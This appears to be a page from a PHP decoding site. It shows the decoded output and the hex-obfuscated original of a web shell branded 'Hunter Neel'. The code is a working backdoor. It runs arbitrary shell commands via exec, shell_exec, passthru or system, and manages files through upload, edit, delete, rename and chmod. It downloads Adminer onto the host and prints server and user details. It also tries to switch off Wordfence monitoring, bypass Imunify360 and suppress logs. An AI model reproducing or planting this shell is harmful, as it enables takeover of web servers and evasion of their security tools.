Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by unphp.net */ goto SdaSl; ZuuGp: function countDomainsInServer() { $ser..

Decoded Output download

<?  /* Decoded by unphp.net */ 
 
 
 goto SdaSl; ZuuGp: function countDomainsInServer() { $serverName = $_SERVER["SERVER_NAME"]; $ipAddresses = @gethostbynamel($serverName); if ($ipAddresses !== false) { return count($ipAddresses); } else { return 0; } } goto sO8Wy; eO00O: echo @getmygid(); goto vKoGx; xu3aV: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { echo "<a href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } $linkPath = implode("/", array_slice($paths, 0, $id + 1)); echo "<a href="?path={$linkPath}">{$pat}</a>/"; } goto MZ4OE; uA8n9: ?> 
<li>Safe Mode:<?php  goto O2Uns; pVd1K: if (isset($_POST["create_file"]) && !empty($_POST["new_file_name"])) { $newFileName = $_POST["new_file_name"]; $filePath = $path . "/" . $newFileName; $created = fopen($filePath, "w"); if ($created) { echo "<div class="alert alert-success" role="alert">File Created Successfully.</div>"; } else { echo "<div class="alert alert-danger" role="alert">Failed to Create File.</div>"; } } goto trdvW; gkzMa: ?> 
<div class="container"><h2>Filemanager</h2><table><tr><th>Name</th><th>Size</th><th>Permission</th><th>Actions</th></tr><?php  goto lE75A; FKCi1: if (function_exists("litespeed_request_headers")) { $headers = litespeed_request_headers(); if (isset($headers["X-LSCACHE"])) { header("X-LSCACHE: off"); } } goto Lca1y; gow2S: $path = str_replace("\", "/", $path); goto dLT50; MZ4OE: ?> 
</div><div class="input-Adminer"><form action=""method="post"><input type="hidden"value="true"name="Adminer"> <input type="submit"class="button"value="Adminer"></form></div></div><?php  goto y7vDK; EYXhW: echo @get_current_user() . "@" . @gethostbyname($_SERVER["HTTP_HOST"]) . ": ~ $"; goto KE9s0; SWT7G: echo @php_uname(); goto M_VnH; l1xsK: ?> 
</li><li>Group ID:<?php  goto eO00O; MktU7: $path = isset($_GET["path"]) ? $_GET["path"] : getcwd(); goto gow2S; JvglE: if (isset($_SERVER["HTTP_CF_CONNECTING_IP"]) && defined("CLOUDFLARE_VERSION")) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CF_CONNECTING_IP"]; if (isset($apacheHeaders["HTTP_CF_VISITOR"])) { header("HTTP_CF_VISITOR: " . $apacheHeaders["HTTP_CF_VISITOR"]); } } goto SAb8j; sO8Wy: $domainCount = @countDomainsInServer(); goto gxRrT; OLRxj: if (function_exists("disk_total_space")) { ?> 
<li>HDD Total Space:<?php  echo @formatBytes(disk_total_space("/")); ?> 
</li><li>HDD Free Space:<?php  echo @formatBytes(disk_free_space("/")); ?> 
</li><?php  } goto uA8n9; BsY6q: ?> 
</li><li>Disable Functions:<?php  goto cDRBY; I7CT2: ?> 
</li><li>Server Software:<?php  goto hJuAm; A29m2: @ini_set("log_errors", 0); goto IkPzI; v3M0q: @header("Content-Encoding: none"); goto dF1UA; df7X0: ?> 
<hr>DIR : <a href="?path=/">Home</a><?php  goto xu3aV; mpPMq: function formatSizeUnits($bytes) { $units = array("bytes", "KB", "MB", "GB"); $index = 0; while ($bytes >= 1024 && $index < 3) { $bytes /= 1024; $index++; } return round($bytes, 2) . " " . $units[$index]; } goto XMQnb; ItLAz: ?> 
</li><li>User ID:<?php  goto YAR7p; IwOJK: @ob_clean(); goto SUeYR; jr2kg: ?> 
</li><?php  goto OLRxj; aYdJu: if (!empty($cmdOutput)) { ?> 
<div class="message-container"><pre><?php  echo htmlspecialchars($cmdOutput); ?> 
</pre></div><?php  } goto X_Go3; X2QF8: ?> 
</li><li>Total Domains in Server:<?php  goto v3H6_; VAAFP: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["edit"]) && $_POST["edit"] === "true") { $editedFile = $_POST["file"]; $newContent = $_POST["new_content"]; $path = isset($_GET["path"]) ? $_GET["path"] : getcwd(); $filePath = $path . "/" . $editedFile; if (file_put_contents($filePath, $newContent) !== false) { echo "<div class='message-container'><p>File saved successfully. {$filePath} </p>"; } else { echo "<p>Failed to save the file.</p></div>"; } } goto heUdx; hJuAm: echo $_SERVER["SERVER_SOFTWARE"]; goto jr2kg; XBrUo: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["Adminer"]) && $_POST["Adminer"] === "true") { $baseUrl = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php"; $path = isset($_GET["path"]) ? $_GET["path"] : getcwd(); $fileName = "adminer.php"; $filePath = $path . "/" . $fileName; $fileContent = @file_get_contents($baseUrl); if ($fileContent !== false) { if (file_put_contents($filePath, $fileContent) !== false) { echo "<p>Adminer successfully. {$filePath} .</p>"; } else { echo "<p>Adminer failed.</p>"; } } else { echo "<p>Failed to fetch the file content. None File</p>"; } } goto zoqL1; vKoGx: ?> 
</li></ul></div></div></div><script>function toggleOptionsMenu(){document.getElementById("optionsMenu").classList.toggle("show")}function toggleSidebar(){document.getElementById("sidebar").classList.toggle("open")}</script><div class="footer"><p><?php  goto cKLcS; GZABv: ?> 
</li><?php  goto qtR7L; Lca1y: if (defined("WORDFENCE_VERSION")) { define("WORDFENCE_DISABLE_LIVE_TRAFFIC", true); define("WORDFENCE_DISABLE_FILE_MODS", true); } goto rCFc2; Zu2nS: function getPermissionString($perms) { $info = ''; $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto mpPMq; KE9s0: ?> 
<input name="cmd"size="30"height="10"placeholder="Enter a command..."> <input type="submit"class="empty-button"></form></div><?php  goto aYdJu; JBuPG: echo @gethostname(); goto GZABv; xljA_: ?> 
<li>PHP Version:<?php  goto i6HSr; XMQnb: ?> 
</table></div><div class="sidebar"id="sidebar"><div class="sidebar-content"><div class="sidebar-close"><button onclick="toggleSidebar()">Close</button></div><div class="info-container"><h2>Server Info</h2><?php  goto ZuuGp; T54Ly: if ($_SERVER["REQUEST_METHOD"] === "GET" && isset($_GET["rename"])) { $oldName = $_GET["rename"]; echo "<div class="message-container">"; echo "<p>Rename : {$oldName}</p>"; echo "<form method="POST" action="">"; echo "<input type="hidden" name="rename" value="true">"; echo "<input type="hidden" name="old_name" value="" . htmlspecialchars($oldName) . "">"; echo "<input type="text" name="new_name" placeholder="Enter new name" required>"; echo "<input type="submit" value="Rename">"; echo "</form>"; echo "</div>"; } goto VAAFP; rCFc2: if (function_exists("imunify360_request_headers") && defined("IMUNIFY360_VERSION")) { $imunifyHeaders = imunify360_request_headers(); if (isset($imunifyHeaders["X-Imunify360-Request"])) { header("X-Imunify360-Request: bypass"); } if (isset($imunifyHeaders["X-Imunify360-Captcha-Bypass"])) { header("X-Imunify360-Captcha-Bypass: " . $imunifyHeaders["X-Imunify360-Captcha-Bypass"]); } } goto PYF3C; W23ol: @error_reporting(0); goto EVlTR; IkPzI: @ini_set("max_execution_time", 0); goto W23ol; gxRrT: function formatBytes($bytes, $precision = 2) { $units = array("B", "KB", "MB", "GB", "TB"); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= 1 << 10 * $pow; return round($bytes, $precision) . " " . $units[$pow]; } goto JKKjb; M_VnH: ?> 
</li></ul></div><div class="info-container"><h2>User Info</h2><ul class="info-list"><li>Username:<?php  goto CVhSD; vSfd0: if ($_SERVER["REQUEST_METHOD"] === "GET" && isset($_GET["delete"])) { $deletePath = $_GET["delete"]; $deletePath = str_replace("/", '', $deletePath); $deletePath = $path . "/" . $deletePath; if (is_file($deletePath)) { if (unlink($deletePath)) { echo "<div class='message-container'><p>File deleted successfully: {$deletePath}</p></div>"; } else { echo "<div class='message-container'><p>Failed to delete the file: {$deletePath}</p></div>"; } } elseif (is_dir($deletePath)) { if (rmdir($deletePath)) { echo "<div class='message-container'><p>Folder deleted successfully: {$deletePath}</p></div>"; } else { echo "<div class='message-container'><p>Failed to delete the folder: {$deletePath}</p></div>"; } } else { echo "<div class='message-container'><p>Invalid file or folder path: {$deletePath}</p></div>"; } } goto L_0ON; qtR7L: if (isset($_SERVER["SERVER_ADDR"])) { ?> 
<li>IP Address:<?php  echo $_SERVER["SERVER_ADDR"]; ?> 
</li><?php  } goto xljA_; heUdx: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["rename"]) && $_POST["rename"] === "true") { $oldName = $_POST["old_name"]; $newName = $_POST["new_name"]; $newPath = $path . "/" . $newName; $oldPath = $path . "/" . $oldName; if (rename($oldPath, $newPath)) { echo "<div class='message-container'><p>Renaming successful. {$newName}</p>"; } else { echo "<p>Failed to rename.</p></div>"; } } goto vSfd0; cDRBY: echo @ini_get("disable_functions"); goto X2QF8; PYF3C: if (function_exists("apache_request_headers")) { $apacheHeaders = apache_request_headers(); if (isset($apacheHeaders["X-Mod-Security"])) { header("X-Mod-Security: " . $apacheHeaders["X-Mod-Security"]); } } goto JvglE; SUeYR: @header("X-Accel-Buffering: no"); goto v3M0q; trdvW: echo "
    <form method="POST">\xa    <input type="text" name="new_folder_name" placeholder="New Folder Name">
    <input type="submit" name="create_folder" value="Create Folder">
    </form>"; goto gQXwC; Qr8vd: ?> 
<form action=""method="POST"><?php  goto EYXhW; owT3v: @http_response_code(404); goto MFyDx; gQXwC: echo "\xa    <form method="POST">\xa    <input type="text" name="new_file_name" placeholder="New File Name">\xa    <input type="submit" name="create_file" value="Create File">
    </form>"; goto XBrUo; CVhSD: echo @get_current_user(); goto ItLAz; fnfxP: ?> 
</li><li>System:<?php  goto SWT7G; i6HSr: echo @phpversion(); goto I7CT2; X_Go3: if (isset($_GET["file"])) { $file = $_GET["file"]; $filePath = $path . "/" . $file; $fileContent = @file_get_contents($filePath); if ($fileContent !== false) { echo "<div class="message-container">"; echo "<p>Edit File: {$file}</p>"; echo "<form method="POST" action="">"; echo "<input type="hidden" name="edit" value="true">"; echo "<input type="hidden" name="file" value="{$file}">"; echo "<textarea name="new_content" rows="10" cols="100" placeholder="Enter new content...">" . htmlspecialchars($fileContent) . "</textarea>"; echo "<input type="submit" value="Edit">"; echo "</form>"; echo "</div>"; } } goto T54Ly; v3H6_: echo $domainCount; goto fnfxP; MFyDx: @http_response_code(500); goto FKCi1; EVlTR: @set_time_limit(0); goto IwOJK; cKLcS: echo date("Y"); goto o69h5; YAR7p: echo @getmyuid(); goto l1xsK; zoqL1: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_FILES["file"])) { if ($_FILES["file"]["size"] === 0) { echo "<p>Open Ur Eyes Bitch !!!.</p>"; } else { $uploadPath = $path . "/" . $_FILES["file"]["name"]; if (move_uploaded_file($_FILES["file"]["tmp_name"], $uploadPath)) { echo "<p>File uploaded successfully. {$uploadPath} .</p>"; } else { echo "<p>File upload failed.</p>"; } } } goto Cz50P; ZgpG9: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["cmd"])) { $cmdOutput = null; $cmd = $_POST["cmd"]; $path = isset($_GET["path"]) ? $_GET["path"] : getcwd(); $cmd = "cd " . escapeshellarg($path) . " && " . $cmd; if (function_exists("exec")) { @exec($cmd, $output, $returnVar); if ($returnVar === 0) { $cmdOutput = implode("\xa", $output); } } elseif (function_exists("shell_exec")) { $cmdOutput = @shell_exec($cmd); } elseif (function_exists("passthru")) { ob_start(); @passthru($cmd, $returnVar); $cmdOutput = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($cmd, $returnVar); $cmdOutput = ob_get_clean(); } } goto Qr8vd; y7vDK: if (isset($_POST["create_folder"]) && !empty($_POST["new_folder_name"])) { $newFolderName = $_POST["new_folder_name"]; $created = mkdir($path . "/" . $newFolderName, 493); if ($created) { echo "<div class="alert alert-success" role="alert">Folder Created Successfully.</div>"; } else { echo "<div class="alert alert-danger" role="alert">Failed to Create Folder.</div>"; } } goto pVd1K; dF1UA: @http_response_code(403); goto owT3v; dLT50: $paths = @explode("/", $path); goto df7X0; Cz50P: ?> 
</div><div class="container"><?php  goto ZgpG9; SAb8j: ?> 
<!doctypehtml><html><head><audio autoplay><source src="https://www.soundjay.com/buttons/beep-24.mp3"type="audio/mpeg"></audio><style>body{font-family:Arial,sans-serif;background-color:#f2f2f2;margin:0;padding:0}.container{max-width:800px;margin:20px auto;padding:20px;border:1px solid #ccc;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.1);background-color:#fff;position:relative}.footer{text-align:center;max-width:800px;position:relative;background-color:#fff;border:1px solid #ccc;padding:20px;margin:20px auto}.message-container{max-width:800px;margin:20px auto;padding:20px;border:1px solid #ccc;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.1);background-color:#fff;position:relative}h1{text-align:center}.button-container{display:flex;justify-content:space-between;align-items:center;margin-top:20px}.empty-button{background:0 0;border:none;color:transparent;cursor:pointer;padding:0;outline:0}table{width:100%;border-collapse:collapse;margin-top:20px}table td,table th{padding:10px;border:1px solid #ccc}table th{background-color:#f2f2f2;font-weight:700}.sidebar{position:fixed;top:0;margin:20px auto;padding:20px;right:-300px;width:300px;height:100%;background-color:#f2f2f2;box-shadow:0 0 10px rgba(0,0,0,.1);transition:right .3s ease-in-out}.sidebar.open{right:0}.sidebar-content{padding:20px}.sidebar-close{text-align:right;margin-bottom:20px}.sidebar-close button{padding:5px 10px;border:none;background-color:#ccc;color:#fff;cursor:pointer}.menu-icon{position:absolute;top:20px;right:20px;width:30px;height:30px;background-color:#ccc;border-radius:50%;cursor:pointer;display:flex;justify-content:center;align-items:center}.menu-icon::after,.menu-icon::before{content:"";position:absolute;width:20px;height:2px;background-color:#fff;transition:transform .3s ease-in-out}.menu-icon::before{transform:translateY(-6px)}.menu-icon::after{transform:translateY(6px)}.menu-icon.open::before{transform:translateY(0) rotate(45deg)}.menu-icon.open::after{transform:translateY(0) rotate(-45deg)}.sidebar h2{margin-top:0}.info-list{list-style:none;padding:0}.info-list li{margin-bottom:10px}.info-list li:last-child{margin-bottom:0}.sidebar .info-container{margin-bottom:20px}</style></head><body><div class="container"><h1>Hunter Neel</h1><div class="menu-icon"onclick="toggleSidebar()"></div><hr><div class="button-container"><div class="input-file"><label class="input-file-label"for="file-input">Choose File</label><form action=""method="post"enctype="multipart/form-data"><input type="file"name="file"id="file-input"> <input type="submit"class="button"value="Upload"></form><?php  goto MktU7; WiuLH: if ($scandir !== false) { $folders = array(); $files = array(); foreach ($scandir as $file) { $filePath = "{$path}/{$file}"; if (is_dir($filePath)) { $folders[] = $file; } else { if (is_file($filePath)) { $size = filesize($filePath); $size = formatSizeUnits($size); $perms = fileperms($filePath); $permission = getPermissionString($perms); $files[$file] = array("size" => $size, "permission" => $permission); } } } foreach ($folders as $folder) { $folderPath = "{$path}/{$folder}"; $folderPermissionColor = is_writable($folderPath) ? "green" : "red"; ?> 
<tr><td><a href="?path=<?php  echo $folderPath; ?> 
"><?php  echo $folder; ?> 
</a></td><td><span style="color:<?php  echo $folderPermissionColor; ?> 
"><?php  echo getPermissionString(fileperms($folderPath)); ?> 
</span></td><td>-</td><td><select onchange='folderDropdownAction(this.value,"<?php  echo $path; ?> 
","<?php  echo $folder; ?> 
")'><option value=""disabled selected>Actions</option><option value="rename">Rename</option><option value="delete">Delete</option><option value="chmod">Chmod</option></select></td></tr><script>function folderDropdownAction(e,n,o){if("rename"===e)window.location.href="?path="+n+"&rename="+o;else if("delete"===e){confirm("Apakah Anda yakin ingin menghapus folder ini?")&&(window.location.href="?path="+n+"&delete="+o)}else"chmod"===e&&(window.location.href="?path="+n+"&chmod="+o)}</script><?php  } foreach ($files as $file => $data) { $filePermissionColor = is_writable($path . "/" . $file) ? "green" : "red"; ?> 
<tr><td><a href="?path=<?php  echo $path; ?> 
&file=<?php  echo $file; ?> 
"><?php  echo $file; ?> 
</a></td><td><?php  echo $data["size"]; ?> 
</td><td><span style="color:<?php  echo $filePermissionColor; ?> 
"><?php  echo $data["permission"]; ?> 
</span></td><td><select onchange='dropdownAction(this.value,"<?php  echo $path; ?> 
","<?php  echo $file; ?> 
")'><option value=""disabled selected>Actions</option><option value="edit">Edit</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option></select></td></tr><script>function dropdownAction(e,i,n){if("edit"===e)window.location.href="?path="+i+"&file="+n;else if("delete"===e){confirm("Apakah Anda yakin ingin menghapus file ini?")&&(window.location.href="?path="+i+"&delete="+n)}else"chmod"===e?window.location.href="?path="+i+"&chmod="+n:"rename"===e&&(window.location.href="?path="+i+"&rename="+n)}</script><?php  } } else { echo "<tr><td colspan="4">None Directory</td></tr>"; } goto Zu2nS; SdaSl: @ini_set("error_log", NULL); goto A29m2; JKKjb: ?> 
<ul class="info-list"><li>Hostname:<?php  goto JBuPG; lE75A: $scandir = @scandir($path); goto WiuLH; O2Uns: echo @ini_get("safe_mode") ? "Enabled" : "Disabled"; goto BsY6q; L_0ON: if ($_SERVER["REQUEST_METHOD"] === "GET" && isset($_GET["chmod"])) { $chmodPath = $_GET["chmod"]; if (strpos($chmodPath, "/") !== 0) { $path = isset($_GET["path"]) ? $_GET["path"] : getcwd(); $chmodPath = rtrim($path, "/") . "/" . ltrim($chmodPath, "/"); } if (is_file($chmodPath) || is_dir($chmodPath)) { if (isset($_GET["mode"]) && preg_match("/^[0-7]{3}$/", $_GET["mode"])) { $mode = intval($_GET["mode"], 8); if (chmod($chmodPath, $mode)) { echo "<div class='message-container'><p>Chmod successful: {$chmodPath}</p></div>"; } else { echo "<div class='message-container'><p>Failed to chmod: {$chmodPath}</p></div>"; } } else { $currentMode = fileperms($chmodPath) & 511; echo "<div class='message-container'>"; echo "<p>Chmod: {$chmodPath}</p>"; echo "<form method='GET' action=''>"; echo "<input type='hidden' name='path' value='{$path}'>"; echo "<input type='hidden' name='chmod' value='{$chmodPath}'>"; echo "<input type='text' name='mode' placeholder='Enter new mode (e.g., 755)' required>"; echo "<input type='submit' value='Chmod'>"; echo "</form>"; echo "<p>Current mode: {$currentMode}</p>"; echo "</div>"; } } else { echo "<div class='message-container'><p>Invalid file or folder path: {$chmodPath}</p></div>"; } } goto gkzMa; o69h5: ?> 
<a href="https://t.me/neel_info">Hunter Neel</a>. All rights reserved.</p></div></body></htm

Did this file decode correctly?

Original Code

/* Decoded by unphp.net */


 goto SdaSl; ZuuGp: function countDomainsInServer() { $serverName = $_SERVER["\123\105\x52\x56\105\x52\x5f\x4e\x41\x4d\105"]; $ipAddresses = @gethostbynamel($serverName); if ($ipAddresses !== false) { return count($ipAddresses); } else { return 0; } } goto sO8Wy; eO00O: echo @getmygid(); goto vKoGx; xu3aV: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { echo "\74\141\x20\x68\x72\x65\x66\x3d\x22\77\x70\141\164\150\75\57\x22\x3e\x2f\x3c\57\141\76"; continue; } if ($pat == '') { continue; } $linkPath = implode("\57", array_slice($paths, 0, $id + 1)); echo "\74\141\x20\150\x72\x65\146\x3d\x22\77\160\x61\164\x68\x3d{$linkPath}\42\x3e{$pat}\74\57\x61\76\x2f"; } goto MZ4OE; uA8n9: ?>
<li>Safe Mode:<?php  goto O2Uns; pVd1K: if (isset($_POST["\143\162\x65\141\x74\x65\137\146\x69\154\145"]) && !empty($_POST["\156\145\167\x5f\x66\x69\x6c\145\137\x6e\141\x6d\145"])) { $newFileName = $_POST["\x6e\x65\x77\137\x66\x69\154\x65\137\x6e\x61\155\145"]; $filePath = $path . "\57" . $newFileName; $created = fopen($filePath, "\x77"); if ($created) { echo "\x3c\x64\x69\x76\40\143\154\x61\x73\163\x3d\x22\x61\x6c\145\x72\164\x20\141\x6c\x65\x72\164\55\x73\165\x63\x63\145\x73\x73\42\x20\x72\x6f\x6c\145\75\x22\141\x6c\145\x72\164\x22\76\106\x69\x6c\x65\40\103\162\x65\x61\x74\x65\144\40\x53\x75\x63\143\x65\163\163\146\x75\154\154\171\x2e\74\57\x64\151\166\x3e"; } else { echo "\74\144\151\166\40\x63\154\x61\163\163\75\42\x61\x6c\145\x72\164\x20\x61\154\x65\162\x74\55\x64\x61\156\147\x65\x72\x22\40\162\x6f\154\145\x3d\x22\x61\154\x65\162\164\42\76\106\x61\x69\x6c\145\x64\x20\164\x6f\40\x43\162\x65\141\x74\145\40\x46\x69\154\x65\56\74\x2f\144\x69\x76\76"; } } goto trdvW; gkzMa: ?>
<div class="container"><h2>Filemanager</h2><table><tr><th>Name</th><th>Size</th><th>Permission</th><th>Actions</th></tr><?php  goto lE75A; FKCi1: if (function_exists("\x6c\x69\x74\145\163\160\x65\145\144\x5f\162\x65\161\165\145\x73\x74\137\150\x65\x61\x64\x65\162\163")) { $headers = litespeed_request_headers(); if (isset($headers["\130\55\x4c\x53\103\101\103\110\105"])) { header("\130\x2d\114\x53\103\x41\103\110\105\72\x20\157\x66\146"); } } goto Lca1y; gow2S: $path = str_replace("\x5c", "\x2f", $path); goto dLT50; MZ4OE: ?>
</div><div class="input-Adminer"><form action=""method="post"><input type="hidden"value="true"name="Adminer"> <input type="submit"class="button"value="Adminer"></form></div></div><?php  goto y7vDK; EYXhW: echo @get_current_user() . "\100" . @gethostbyname($_SERVER["\110\x54\x54\120\x5f\x48\117\123\x54"]) . "\72\x20\x7e\x20\44"; goto KE9s0; SWT7G: echo @php_uname(); goto M_VnH; l1xsK: ?>
</li><li>Group ID:<?php  goto eO00O; MktU7: $path = isset($_GET["\x70\141\164\150"]) ? $_GET["\x70\141\x74\x68"] : getcwd(); goto gow2S; JvglE: if (isset($_SERVER["\110\x54\124\x50\x5f\103\106\137\x43\117\x4e\116\105\103\x54\111\116\x47\x5f\x49\120"]) && defined("\x43\114\x4f\125\104\106\114\x41\122\x45\137\x56\105\x52\x53\111\117\x4e")) { $_SERVER["\x52\105\115\117\x54\105\x5f\x41\x44\104\122"] = $_SERVER["\110\124\x54\120\x5f\103\106\137\x43\117\116\116\105\103\x54\111\116\x47\137\111\x50"]; if (isset($apacheHeaders["\x48\124\x54\x50\137\103\x46\x5f\126\111\x53\x49\x54\x4f\x52"])) { header("\110\x54\x54\120\x5f\103\106\137\126\x49\x53\x49\124\x4f\x52\72\40" . $apacheHeaders["\x48\x54\x54\120\x5f\103\x46\x5f\126\x49\123\111\x54\x4f\122"]); } } goto SAb8j; sO8Wy: $domainCount = @countDomainsInServer(); goto gxRrT; OLRxj: if (function_exists("\x64\151\163\x6b\137\164\157\x74\x61\x6c\137\163\x70\x61\143\145")) { ?>
<li>HDD Total Space:<?php  echo @formatBytes(disk_total_space("\57")); ?>
</li><li>HDD Free Space:<?php  echo @formatBytes(disk_free_space("\57")); ?>
</li><?php  } goto uA8n9; BsY6q: ?>
</li><li>Disable Functions:<?php  goto cDRBY; I7CT2: ?>
</li><li>Server Software:<?php  goto hJuAm; A29m2: @ini_set("\x6c\x6f\147\137\x65\162\x72\157\x72\x73", 0); goto IkPzI; v3M0q: @header("\103\x6f\x6e\x74\145\x6e\x74\55\105\156\143\x6f\144\x69\x6e\147\x3a\40\x6e\x6f\156\x65"); goto dF1UA; df7X0: ?>
<hr>DIR : <a href="?path=/">Home</a><?php  goto xu3aV; mpPMq: function formatSizeUnits($bytes) { $units = array("\x62\171\x74\x65\x73", "\x4b\102", "\115\102", "\x47\x42"); $index = 0; while ($bytes >= 1024 && $index < 3) { $bytes /= 1024; $index++; } return round($bytes, 2) . "\x20" . $units[$index]; } goto XMQnb; ItLAz: ?>
</li><li>User ID:<?php  goto YAR7p; IwOJK: @ob_clean(); goto SUeYR; jr2kg: ?>
</li><?php  goto OLRxj; aYdJu: if (!empty($cmdOutput)) { ?>
<div class="message-container"><pre><?php  echo htmlspecialchars($cmdOutput); ?>
</pre></div><?php  } goto X_Go3; X2QF8: ?>
</li><li>Total Domains in Server:<?php  goto v3H6_; VAAFP: if ($_SERVER["\x52\105\x51\x55\x45\x53\x54\x5f\x4d\105\124\x48\117\104"] === "\x50\117\x53\x54" && isset($_POST["\x65\144\x69\164"]) && $_POST["\x65\x64\x69\164"] === "\x74\x72\165\145") { $editedFile = $_POST["\x66\151\154\145"]; $newContent = $_POST["\x6e\145\167\137\x63\x6f\x6e\x74\145\156\164"]; $path = isset($_GET["\x70\141\x74\x68"]) ? $_GET["\x70\x61\164\x68"] : getcwd(); $filePath = $path . "\57" . $editedFile; if (file_put_contents($filePath, $newContent) !== false) { echo "\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\47\x6d\145\x73\163\x61\147\x65\55\143\157\x6e\164\x61\151\x6e\145\x72\47\x3e\74\x70\76\106\x69\154\x65\x20\x73\141\x76\x65\144\40\x73\x75\x63\143\145\163\163\x66\x75\154\x6c\171\x2e\x20{$filePath}\40\x3c\x2f\x70\76"; } else { echo "\74\x70\x3e\x46\141\x69\154\145\144\x20\x74\x6f\40\x73\141\x76\145\x20\x74\x68\145\x20\x66\x69\154\145\x2e\x3c\57\x70\76\x3c\57\144\x69\166\76"; } } goto heUdx; hJuAm: echo $_SERVER["\123\105\x52\x56\105\122\137\x53\x4f\x46\124\127\x41\x52\105"]; goto jr2kg; XBrUo: if ($_SERVER["\x52\105\121\125\x45\x53\x54\x5f\x4d\x45\x54\x48\117\x44"] === "\120\x4f\123\x54" && isset($_POST["\101\144\x6d\x69\x6e\x65\x72"]) && $_POST["\101\x64\x6d\151\156\x65\x72"] === "\164\x72\x75\x65") { $baseUrl = "\150\164\x74\160\163\72\x2f\x2f\147\151\x74\x68\165\x62\x2e\143\157\155\x2f\166\162\x61\x6e\x61\57\141\144\155\x69\x6e\145\162\57\162\x65\154\145\141\x73\x65\163\57\x64\x6f\167\156\154\x6f\x61\x64\x2f\x76\x34\x2e\70\x2e\61\x2f\141\x64\x6d\151\156\x65\162\55\x34\56\x38\x2e\x31\56\160\150\160"; $path = isset($_GET["\x70\141\x74\150"]) ? $_GET["\x70\141\164\x68"] : getcwd(); $fileName = "\141\x64\155\x69\x6e\x65\x72\x2e\x70\150\x70"; $filePath = $path . "\x2f" . $fileName; $fileContent = @file_get_contents($baseUrl); if ($fileContent !== false) { if (file_put_contents($filePath, $fileContent) !== false) { echo "\74\x70\76\x41\x64\155\151\x6e\x65\162\x20\163\165\143\x63\x65\x73\163\146\165\x6c\154\171\x2e\x20{$filePath}\40\56\x3c\57\x70\x3e"; } else { echo "\74\x70\76\101\144\x6d\x69\x6e\145\162\x20\146\x61\151\154\x65\x64\x2e\74\x2f\x70\x3e"; } } else { echo "\x3c\x70\76\x46\x61\x69\154\145\x64\40\x74\x6f\40\x66\x65\x74\x63\x68\x20\164\x68\x65\x20\146\x69\x6c\x65\40\143\x6f\156\x74\x65\156\164\56\x20\x4e\x6f\156\x65\x20\x46\x69\154\x65\x3c\x2f\160\x3e"; } } goto zoqL1; vKoGx: ?>
</li></ul></div></div></div><script>function toggleOptionsMenu(){document.getElementById("optionsMenu").classList.toggle("show")}function toggleSidebar(){document.getElementById("sidebar").classList.toggle("open")}</script><div class="footer"><p><?php  goto cKLcS; GZABv: ?>
</li><?php  goto qtR7L; Lca1y: if (defined("\127\x4f\122\104\106\x45\x4e\x43\105\137\126\105\x52\x53\111\x4f\116")) { define("\x57\x4f\x52\104\x46\x45\116\x43\105\137\x44\x49\x53\101\x42\114\x45\x5f\114\x49\x56\105\x5f\124\x52\101\106\106\111\x43", true); define("\127\x4f\x52\x44\x46\105\x4e\103\105\x5f\x44\x49\x53\101\x42\114\x45\137\106\111\x4c\105\137\x4d\117\x44\x53", true); } goto rCFc2; Zu2nS: function getPermissionString($perms) { $info = ''; $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\167" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\162" : "\55"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\170" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\x77" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\124" : "\55"); return $info; } goto mpPMq; KE9s0: ?>
<input name="cmd"size="30"height="10"placeholder="Enter a command..."> <input type="submit"class="empty-button"></form></div><?php  goto aYdJu; JBuPG: echo @gethostname(); goto GZABv; xljA_: ?>
<li>PHP Version:<?php  goto i6HSr; XMQnb: ?>
